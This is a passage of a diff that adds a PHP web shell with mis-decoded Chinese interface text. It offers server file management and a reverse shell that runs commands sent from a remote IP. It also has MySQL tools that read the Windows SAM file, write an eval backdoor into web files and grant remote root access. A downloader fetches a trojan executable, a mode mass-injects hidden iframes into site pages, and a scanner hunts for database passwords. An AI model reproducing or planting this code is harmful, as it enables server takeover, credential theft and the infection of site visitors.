+		@touch($_POST['newfile'],@strtotime($_POST['time']));
+	}
+	html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path='.$path.'"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>');
+	html_a('?eanver=main&path='.uppath($path),'<b>�ϼ�Ŀ¼</b>');
+	html_n('</b></td><td align="center" width="10%"><b>����</b></td><td align="center" width="5%">');
+	html_n('<b>�ļ�����</b></td><td align="center" width="10%"><b>�޸�ʱ��</b></td><td align="center" width="10%"><b>�ļ���С</b></td></tr>');
+	while($dirs = @$dir->read()){
+		if($dirs == '.' or $dirs == '..') continue;
+		$dirpath = str_path("$path/$dirs");
+		if(is_dir($dirpath)){
+			$perm = substr(base_convert(fileperms($dirpath),10,8),-4);
+			$filetime = @date('Y-m-d H:i:s',@filemtime($dirpath));
+			$dirpath = urlencode($dirpath);
+			html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$dirs.'">');
+			html_img("dir");
+			html_a('?eanver=main&path='.$dirpath,$dirs);
+			html_n('</td><td align="center">');
+			html_n("<a href=\"#\" onClick=\"rusurechk('$dirs','?eanver=rename&p=$dirpath&newname=');return false;\">����</a>");
+			html_n("<a href=\"#\" onClick=\"rusuredel('$dirs','?eanver=deltree&p=$dirpath');return false;\">ɾ��</a> ");
+			html_a('?pack='.$dirpath,'���');
+			html_n('</td><td align="center">');
+			html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm);
+			html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
+			html_n('</td></tr>');
+			$NUM_D++;
+		}
+	}
+	@$dir->rewind();
+	while($files = @$dir->read()){
+		if($files == '.' or $files == '..') continue;
+		$filepath = str_path("$path/$files");
+		if(!is_dir($filepath)){
+			$fsize = @filesize($filepath);
+			$fsize = File_Size($fsize);
+			$perm  = substr(base_convert(fileperms($filepath),10,8),-4);
+			$filetime = @date('Y-m-d H:i:s',@filemtime($filepath));
+			$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath);
+			$todir=$ROOT_DIR.'/zipfile';
+			$filepath = urlencode($filepath);
+			$it=substr($filepath,-3);
+			html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$files.'">');
+			html_img(css_showimg($files));
+			html_a($Fileurls,$files);
+			html_n('</td><td align="center">');
+            if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z'))
+			   html_a('?unzip='.$filepath,'��ѹ','title="��ѹ'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"');
+			else
+               html_a('?eanver=editr&p='.$filepath,'�༭','title="�༭'.$files.'"');
+
+			html_n("<a href=\"#\" onClick=\"rusurechk('$files','?eanver=rename&p=$filepath&newname=');return false;\">����</a>");
+			html_n("<a href=\"#\" onClick=\"rusuredel('$files','?eanver=del&p=$filepath');return false;\">ɾ��</a> ");
+			html_n("<a href=\"#\" onClick=\"rusurechk('".urldecode($filepath)."','?eanver=copy&p=$filepath&newcopy=');return false;\">����</a>");
+			html_n('</td><td align="center">');
+			html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm);
+			html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
+			html_a('?down='.$filepath,$fsize,'title="����'.$files.'"');
+			html_n('</td></tr>');
+			$NUM_F++;
+		}
+	}
+	@$dir->close();
+	if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8);
+print<<<END
+</table>
+<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined"> 
+<input type="hidden" id="inver" name="inver" value="undefined"> 
+<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> 
+<input type="button" value="����" onclick="SubmitUrl('������ѡ�ļ���·��: ','{$REAL_DIR}','a');return false;"> 
+<input type="button" value="ɾ��" onclick="Delok('��ѡ�ļ�','b');return false;"> 
+<input type="button" value="����" onclick="SubmitUrl('�޸���ѡ�ļ�����ֵΪ: ','0666','c');return false;"> 
+<input type="button" value="ʱ��" onclick="CheckDate('{$Filetime}','d');return false;"> 
+<input type="button" value="���" onclick="SubmitUrl('�����������ѡ�ļ�������Ϊ: ','{$_SERVER['SERVER_NAME']}.tar.gz','e');return false;">
+Ŀ¼({$NUM_D}) / �ļ�({$NUM_F})</div> 
+</form> 
+END;
+	break;
+	
+	case "editr":
+	css_js("2");
+	if(!empty($_POST['uploadt'])){
+		echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]);
+		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
+	}
+	if(!empty($_GET['redir'])){
+        $name=$_GET['name'];
+		$newdir = str_path($p.'/'.$name);
+		@mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]);
+		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
+	}
+
+	if(!empty($_GET['refile'])){
+        $name=$_GET['name'];
+		$jspath=urlencode($p.'/'.$name);
+		$pp = urlencode($p);
+		$p = str_path($p.'/'.$name);
+		$FILE_CODE = "";
+		$charset= 'GB2312';
+        $FILE_TIME =date('Y-m-d H:i:s',time()+3600*8);
+		if(@file_exists($p)) echo '����Ŀ¼����"ͬ��"�ļ�<br>';
+	}else{
+		$jspath=urlencode($p);
+		$FILE_TIME = date('Y-m-d H:i:s',filemtime($p));
+        $FILE_CODE=@file_get_contents($p);
+	     if (substr(PHP_VERSION,0,1)>=5){
+            if(empty($_GET['charset'])){
+			   if(TestUtf8($FILE_CODE)>1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';}
+			  }else{
+			   if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);}
+			  }
+		  }
+        $FILE_CODE = htmlspecialchars($FILE_CODE);
+	}
+print<<<END
+<div class="actall">��������: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
+<input type="button" value="����" onclick="search(searchs.value)"></div>
+<form method='POST' id="editor"  action='?eanver=main&path={$pp}'>
+<div class="actall">
+<input type="text" name="newfile"  id="newfile" value="{$p}" style="width:750px;">ָ�����룺<input name="charset" id="charset" value="{$charset}" Type="text" style="width:80px;" onkeydown="if(event.keyCode==13)window.location='?eanver=editr&p={$jspath}&charset='+this.value;">
+<input type="button" value="ѡ��" onclick="window.location='?eanver=editr&p={$jspath}&charset='+this.form.charset.value;" style="width:50px;"> 
+END;
+html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\"");
+print<<<END
+</div>
+<div class="actall"><textarea name="txt" style="width:100%;height:380px;">{$FILE_CODE}</textarea></div>
+<div class="actall">�ļ��޸�ʱ�� <input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>�Զ�������ʽ�����ļ�(����ʹ��)</div>
+<div class="actall"><input type="button" value="����" onclick="CheckDate();" style="width:80px;"> <input name='reset' type='reset' value='����'> 
+<input type="button" value="����" onclick="window.location='?eanver=main&path={$pp}';" style="width:80px;"></div>
+</form>
+END;
+	break;
+	
+	case "rename":
+	html_n("<tr><td>");
+	$newname = urldecode($pp).'/'.urlencode($_GET['newname']);
+	@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]);
+	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	break;
+	
+	case "deltree":
+	html_n("<tr><td>");
+	do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
+	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	break;
+	
+	case "del":
+	html_n("<tr><td>");
+	@unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
+	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	break;
+	
+	case "copy":
+	html_n("<tr><td>");
+	$newpath = explode('/',$_GET['newcopy']);
+	$pathr[0] = $newpath[0];
+	for($i=1;$i < count($newpath);$i++){
+		$pathr[] = urlencode($newpath[$i]);
+	}
+	$newcopy = implode('/',$pathr);
+	@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);
+	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	break;
+	
+	case "perm":
+	html_n("<form method='POST'><tr><td>".$p.' ����Ϊ: ');
+	if(is_dir($p)){
+		html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']);
+	}else{
+		html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']);
+	}
+	html_input("submit","save","�޸�");
+	back();
+	if($_POST['class']){
+		switch($_POST['class']){
+			case "0777": $change = @chmod($p,0777); break;
+			case "0755": $change = @chmod($p,0755); break;
+			case "0555": $change = @chmod($p,0555); break;
+			case "0666": $change = @chmod($p,0666); break;
+			case "0644": $change = @chmod($p,0644); break;
+			case "0444": $change = @chmod($p,0444); break;
+		}
+		$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);
+		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	}
+	html_n("</td></tr></form>");
+	break;
+
+    case "info_f":
+	$dis_func = get_cfg_var("disable_functions");
+	$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "�������ϴ�";
+	$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
+	if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
+	$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
+	$info = array(
+		array("������ʱ��",date("Y��m��d�� h:i:s",time())),
+		array("����������","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
+		array("������IP��ַ",gethostbyname($_SERVER['SERVER_NAME'])),
+		array("����������ϵͳ",PHP_OS),
+		array("����������ϵͳ���ֱ���",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		array("��������������",$_SERVER['SERVER_SOFTWARE']),
+		array("���IP",$_SERVER["REMOTE_ADDR"]),
+		array("Web����˿�",$_SERVER['SERVER_PORT']),
+		array("PHP���з�ʽ",strtoupper(php_sapi_name())),
+		array("PHP�汾",PHP_VERSION),
+		array("�����ڰ�ȫģʽ",Info_Cfg("safemode")),
+		array("����������Ա",$adminmail),
+		array("���ļ�·��",myaddress),
+		array("����ʹ�� URL ���ļ� allow_url_fopen",Info_Cfg("allow_url_fopen")),
+		array("����ʹ��curl_exec",Info_Fun("curl_exec")),
+		array("������̬�������ӿ� enable_dl",Info_Cfg("enable_dl")),
+		array("��ʾ������Ϣ display_errors",Info_Cfg("display_errors")),
+		array("�Զ�����ȫ�ֱ��� register_globals",Info_Cfg("register_globals")),
+		array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
+		array("�����������ʹ���ڴ��� memory_limit",Info_Cfg("memory_limit")),
+		array("POST����ֽ��� post_max_size",Info_Cfg("post_max_size")),
+		array("��������ϴ��ļ� upload_max_filesize",$upsize),
+		array("���������ʱ�� max_execution_time",Info_Cfg("max_execution_time")."��"),
+		array("�����õĺ��� disable_functions",$dis_func),
+		array("phpinfo()",$phpinfo),
+		array("Ŀǰ���п���ռ�diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
+		array("ͼ�δ��� GD Library",Info_Fun("imageline")),
+		array("IMAP�����ʼ�ϵͳ",Info_Fun("imap_close")),
+		array("MySQL���ݿ�",Info_Fun("mysql_close")),
+		array("SyBase���ݿ�",Info_Fun("sybase_close")),
+		array("Oracle���ݿ�",Info_Fun("ora_close")),
+		array("Oracle 8 ���ݿ�",Info_Fun("OCILogOff")),
+		array("PREL�����﷨ PCRE",Info_Fun("preg_match")),
+		array("PDF�ĵ�֧��",Info_Fun("pdf_close")),
+		array("Postgre SQL���ݿ�",Info_Fun("pg_close")),
+		array("SNMP���������",Info_Fun("snmpget")),
+		array("ѹ���ļ�֧��(Zlib)",Info_Fun("gzclose")),
+		array("XML����",Info_Fun("xml_set_object")),
+		array("FTP",Info_Fun("ftp_login")),
+		array("ODBC���ݿ�����",Info_Fun("odbc_close")),
+		array("Session֧��",Info_Fun("session_start")),
+		array("Socket֧��",Info_Fun("fsockopen")),
+	);
+	$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
+	echo '<table width="100%" border="0">';
+	for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
+try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");
+$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
+$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
+}catch(Exception $e){}
+    echo '<tr><td width="40%">Terminal Service�˿�Ϊ</td><td>'.$registry_proxystring.'</td></tr>'."\n";
+	echo '<tr><td width="40%">Telnet�˿�Ϊ</td><td>'.$Telnet.'</td></tr>'."\n";
+	echo '<tr><td width="40%">PcAnywhere�˿�Ϊ</td><td>'.$PcAnywhere.'</td></tr>'."\n";
+	echo '</table>';
+	break;
+
+	case "nc":
+	$M_ip = isset($_POST['mip']) ? $_POST['mip'] : $_SERVER["REMOTE_ADDR"];
+	$B_port = isset($_POST['bport']) ? $_POST['bport'] : '1019';
+print<<<END
+<form method="POST">
+<div class="actall">ʹ�÷�����<br>
+			�����Լ���������"nc -l -p 1019"<br>
+			Ȼ���ڴ���д����Ե�IP,�����ӣ�</div>
+<div class="actall">���IP <input type="text" name="mip" value="{$M_ip}" style="width:100px;"> �˿ں� <input type="text" name="bport" value="{$B_port}" style="width:50px;"></div>
+<div class="actall"><input type="submit" value="����" style="width:80px;"></div>
+</form>
+END;
+	if((!empty($_POST['mip'])) && (!empty($_POST['bport'])))
+	{
+	echo '<div class="actall">';
+		 $mip=$_POST['mip'];
+		 $bport=$_POST['bport'];
+		 $fp=fsockopen($mip , $bport , $errno, $errstr);
+		 if (!$fp){
+		     $result = "Error: could not open socket connection";
+		    }else {
+		 fputs ($fp ,"\n*********************************************\n 
+		              hacking url:http://www.7jyewu.cn/ is ok!        
+			          \n*********************************************\n\n");
+	     while(!feof($fp)){ 
+         fputs ($fp," [r00t@H4c3ing:/root]# ");
+         $result= fgets ($fp, 4096);
+         $message=`$result`;
+         fputs ($fp,"--> ".$message."\n");
+                          }
+         fclose ($fp);
+		       }
+    echo '</div>';
+    }
+	break;
+
+
+	case "sqlshell":
+	$MSG_BOX = '';
+	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
+	if(isset($_POST['mhost']) && isset($_POST['muser']))
+	{
+		$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
+		if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
+		else $MSG_BOX = '����MYSQLʧ��';
+	}
+	$downfile = 'c:/windows/repair/sam';
+	if(!empty($_POST['downfile']))
+	{
+		$downfile = File_Str($_POST['downfile']);
+		$binpath = bin2hex($downfile);
+		$query = 'select load_file(0x'.$binpath.')';
+		if($result = @mysql_query($query,$conn))
+		{
+			$k = 0; $downcode = '';
+			while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
+			$filedown = basename($downfile);
+			if(!$filedown) $filedown = 'envl.tmp';
+			$array = explode('.', $filedown);
+			$arrayend = array_pop($array);
+			header('Content-type: application/x-'.$arrayend);
+			header('Content-Disposition: attachment; filename='.$filedown);
+			header('Content-Length: '.strlen($downcode));
+			echo $downcode;
+			exit;
+		}
+		else $MSG_BOX = '�����ļ�ʧ��';
+	}
+	$o = isset($_GET['o']) ? $_GET['o'] : '';
+print<<<END
+<form method="POST" name="nform" id="nform">
+<center><div class="actall"><a href="?eanver=sqlshell">[MYSQLִ�����]</a> 
+<a href="?eanver=sqlshell&o=u">[MYSQL�ϴ��ļ�]</a> 
+<a href="?eanver=sqlshell&o=d">[MYSQL�����ļ�]</a></div>
+<div class="actall">
+��ַ <input type="text" name="mhost" value="{$mhost}" style="width:110px">
+�˿� <input type="text" name="mport" value="{$mport}" style="width:110px">
+�û� <input type="text" name="muser" value="{$muser}" style="width:110px">
+���� <input type="text" name="mpass" value="{$mpass}" style="width:110px">
+���� <input type="text" name="mdata" value="{$mdata}" style="width:110px">
+</div>
+<div class="actall" style="height:220px;">
+END;
+if($o == 'u')
+{
+	$uppath = 'C:/Documents and Settings/All Users/����ʼ���˵�/����/����/exp.vbs';
+	if(!empty($_POST['uppath']))
+	{
+		$uppath = $_POST['uppath'];
+		$query = 'Create TABLE a (cmd text NOT NULL);';
+		if(@mysql_query($query,$conn))
+		{
+			if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
+			else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
+			$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
+			if(@mysql_query($query,$conn))
+			{
+				$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
+				$MSG_BOX = @mysql_query($query,$conn) ? '�ϴ��ļ��ɹ�' : '�ϴ��ļ�ʧ��';
+			}
+			else $MSG_BOX = '������ʱ��ʧ��';
+			@mysql_query('Drop TABLE IF EXISTS a;',$conn);
+		}
+		else $MSG_BOX = '������ʱ��ʧ��';
+	}
+print<<<END
+<br><br>�ϴ�·�� <input type="text" name="uppath" value="{$uppath}" style="width:500px">
+<br><br>ѡ���ļ� <input type="file" name="upfile" style="width:500px;height:22px;">
+</div><div class="actall"><input type="submit" value="�ϴ�" style="width:80px;">
+END;
+}
+elseif($o == 'd')
+{
+print<<<END
+<br><br><br>�����ļ� <input type="text" name="downfile" value="{$downfile}" style="width:500px">
+</div><div class="actall"><input type="submit" value="����" style="width:80px;">
+END;
+}
+else
+{
+	if(!empty($_POST['msql']))
+	{
+		$msql = $_POST['msql'];
+		if($result = @mysql_query($msql,$conn))
+		{
+			$MSG_BOX = 'ִ��SQL���ɹ�<br>';
+			$k = 0;
+			while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
+		}
+		else $MSG_BOX .= mysql_error();
+	}
+print<<<END
+<script language="javascript">
+function nFull(i){
+	Str = new Array(11);
+	Str[0] = "select version();";
+	Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
+	Str[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F:/web/bak.php';";
+	Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
+	nform.msql.value = Str[i];
+	return true;
+}
+</script>
+<textarea name="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
+<div class="actall">
+<select onchange="return nFull(options[selectedIndex].value)">
+	<option value="0" selected>��ʾ�汾</option>
+	<option value="1">�����ļ�</option>
+	<option value="2">д���ļ�</option>
+	<option value="3">��������</option>
+</select>
+<input type="submit" value="ִ��" style="width:80px;">
+END;
+}
+	if($MSG_BOX != '') echo '</div><div class="actall">'.$MSG_BOX.'</div></center></form>';
+	else echo '</div></center></form>';
+	break;
+	
+    case "downloader":
+	$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
+	$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
+print<<<END
+	<form method="POST">
+    <div class="actall">������ <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
+    <div class="actall">���ص� <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
+    <div class="actall"><input value="����" type="submit" style="width:80px;"></div></form>
+END;
+	if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
+	{
+		echo '<div class="actall">';
+		$contents = @file_get_contents($_POST['durl']);
+		if(!$contents) echo '�޷���ȡҪ���ص�����';
+		else echo File_Write($_POST['dpath'],$contents,'wb') ? '�����ļ��ɹ�' : '�����ļ�ʧ��';
+		echo '</div>';
+	}
+	break;
+
+	case "issql":
+	session_start();
+  if($_POST['sqluser'] && $_POST['sqlpass']){
+    $_SESSION['sql_user'] = $_POST['sqluser'];
+    $_SESSION['sql_password'] = $_POST['sqlpass'];
+  }
+  if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
+  else{$_SESSION['sql_host'] = 'localhost';}
+  if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
+  else{$_SESSION['sql_port'] = '3306';}
+  if($_SESSION['sql_user'] && $_SESSION['sql_password']){
+    if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
+      unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
+      die(html_a('?eanver=sqlshell','����ʧ���뷵��'));
+    }
+  }
+  else{
+    die(html_a('?eanver=sqlshell','����ʧ���뷵��'));
+  }
+  $query = mysql_query("SHOW DATABASES",$sqlcon);
+  html_n('<tr><td>���ݿ��б�:');
+  while($db = mysql_fetch_array($query)) {
+		html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
+		echo '&nbsp;&nbsp;';
+	}
+  html_n('</td></tr>');
+  if($_GET['db']){
+  	css_js("3");
+    mysql_select_db($_GET['db'], $sqlcon);
+    html_n('<tr><td><form method="POST" name="DbForm"><textarea name="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');
+    html_select(array(0=>"--SQL�﷨--",7=>"��������",8=>"ɾ������",9=>"�޸�����",10=>"�����ݱ�",11=>"ɾ���ݱ�",12=>"�����ֶ�",13=>"ɾ���ֶ�"),0,"onchange='return Full(options[selectedIndex].value)'");
+    html_input("submit","doquery","ִ��");
+    html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
+    html_n('--->');
+    html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
+    html_n('</form><br>');
+  	if(!empty($_POST['sql'])){
+			if (@mysql_query($_POST['sql'],$sqlcon)) {
+				echo "ִ��SQL���ɹ�";
+			}else{
+				echo "����: ".mysql_error();
+			}
+  	}
+    if($_GET['table']){
+      html_n('<table border=1><tr>');
+      $query = "SHOW COLUMNS FROM ".$_GET['table'];
+      $result = mysql_query($query,$sqlcon);
+      $fields = array();
+      while($row = mysql_fetch_assoc($result)){
+        array_push($fields,$row['Field']);
+        html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');
+      }
+      html_n('</tr><tr>');
+      $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
+      while($text = @mysql_fetch_assoc($result)){
+      	foreach($fields as $row){
+      		if($text[$row] == "") $text[$row] = 'NULL';
+      		html_n('<td>'.$text[$row].'</td>');
+      	}
+      	echo '</tr>';
+      }
+    }
+    else{
+      $query = "SHOW TABLES FROM " . $_GET['db'];
+      $dat = mysql_query($query, $sqlcon) or die(mysql_error());
+      while ($row = mysql_fetch_row($dat)){
+        html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");
+      }
+    }
+  }
+	break;
+	
+	case "upfiles":
+	html_n('<tr><td>�����������ϴ������ļ���С: '.@get_cfg_var('upload_max_filesize').'<form method="POST" enctype="multipart/form-data">');
+	html_input("text","uppath",root_dir,"<br>�ϴ���·��: ","51");
+print<<<END
+<SCRIPT language="JavaScript">
+function addTank(){
+var k=0;
+  k=k+1;
+  k=tank.rows.length;
+  newRow=document.all.tank.insertRow(-1)
+  <!--ɾ��ѡ��-->
+  newcell=newRow.insertCell()
+  newcell.innerHTML="<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>"
+}
+
+function delTank() {
+  if(tank.rows.length==1) return;
+  var checkit = false;
+  for (var i=0;i<document.all.tankNo.length;i++) {
+    if (document.all.tankNo[i].checked) {
+      checkit=true;
+      tank.deleteRow(i+1);
+      i--;
+    }
+  }
+  if (checkit) {
+  } else{
+    alert("��ѡ��һ��Ҫɾ���Ķ���");
+    return false;
+  }
+}
+</SCRIPT>
+<br><br>
+<table cellSpacing=0 cellPadding=0 width="100%" border=0>       
+          <tr>
+            <td width="7%"><input class="button01" type="button"  onclick="addTank()" value=" �� �� " name="button2"/>
+            <input name="button3"  type="button" class="button01" onClick="delTank()" value="ɾ��" />
+            </td>
+          </tr>
+</table>
+<table  id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" >
+<tr><td>��ѡ��Ҫ�ϴ����ļ���</td></tr>
+<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr>
+</table>
+END;
+	html_n('<br><input type="submit" name="upfiles" value="�ϴ�" style="width:80px;"> <input type="button" value="����" onclick="window.location=\'?eanver=main&path='.root_dir.'\';" style="width:80px;">');
+	if($_POST['upfiles']){
+		foreach ($_FILES["upfile"]["error"] as $key => $error){
+			if ($error == UPLOAD_ERR_OK){
+				$tmp_name = $_FILES["upfile"]["tmp_name"][$key];
+				$name = $_FILES["upfile"]["name"][$key];
+				$uploadfile = str_path($_POST['uppath'].'/'.$name);
+				$upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];
+				echo '<br><br>'.$upload;
+			}
+		}
+	}
+	html_n('</form>');
+	break;
+	
+	case "guama":
+	$patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
+	$typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
+	$codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>";
+	html_n('<tr><td>�ļ���������"|"����,Ҳ������ָ���ļ���.<form method="POST"><br>');
+	html_input("text","path",$patht,"·����Χ","45");
+	html_input("checkbox","pass","","ʹ��Ŀ¼����","",true);
+	html_input("text","type",$typet,"<br><br>�ļ�����","60");
+	html_text("code","67","5",$codet);
+	html_n('<br><br>');
+	html_radio("��������","��������","guama","qingma");
+	html_input("submit","passreturn","��ʼ");
+	html_n('</td></tr></form>');
+	if(!empty($_POST['path'])){
+		html_n('<tr><td>Ŀ���ļ�:<br><br>');
+		if(isset($_POST['pass'])) $bool = true; else $bool = false;
+		do_passreturn($patht,$codet,$_POST['return'],$bool,$typet);
+	}
+	break;
+	
+	case "tihuan":
+	html_n('<tr><td>�˹��ܿ������滻�ļ�����,��С��ʹ��.<br><br><form method="POST">');
+	html_input("text","path",root_dir,"·����Χ","45");
+	html_input("checkbox","pass","","ʹ��Ŀ¼����","",true);
+	html_text("newcode","67","5",$_POST['newcode']);
+	html_n('<br><br>�滻Ϊ');
+	html_text("oldcode","67","5",$_POST['oldcode']);
+	html_input("submit","passreturn","�滻","<br><br>");
+	html_n('</td></tr></form>');
+	if(!empty($_POST['path'])){
+		html_n('<tr><td>Ŀ���ļ�:<br><br>');
+		if(isset($_POST['pass'])) $bool = true; else $bool = false;
+		do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']);
+	}
+	break;
+	
+	case "scanfile":
+	css_js("4");
+	html_n('<tr><td>�˹��ܿɺܷ��������������MYSQL�û�����������ļ�,������Ȩ.<br>���������ļ�̫��ʱ,��Ӱ��ִ���ٶ�,������ʹ��Ŀ¼����.<form method="POST" name="sform"><br>');
+	html_input("text","path",root_dir,"·����","45");
+	html_input("checkbox","pass","","ʹ��Ŀ¼����","",true);
+	html_input("text","code",$_POST['code'],"<br><br>�ؼ���","40");
+	html_select(array("--MYSQL�����ļ�--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'");
+	html_n('<br><br>');
+	html_radio("�����ļ���","������������","scanfile","scancode");
+	html_input("submit","passreturn","����");
+	html_n('</td></tr></form>');
+	if(!empty($_POST['path'])){
+		html_n('<tr><td>�ҵ��ļ�:<br><br>');
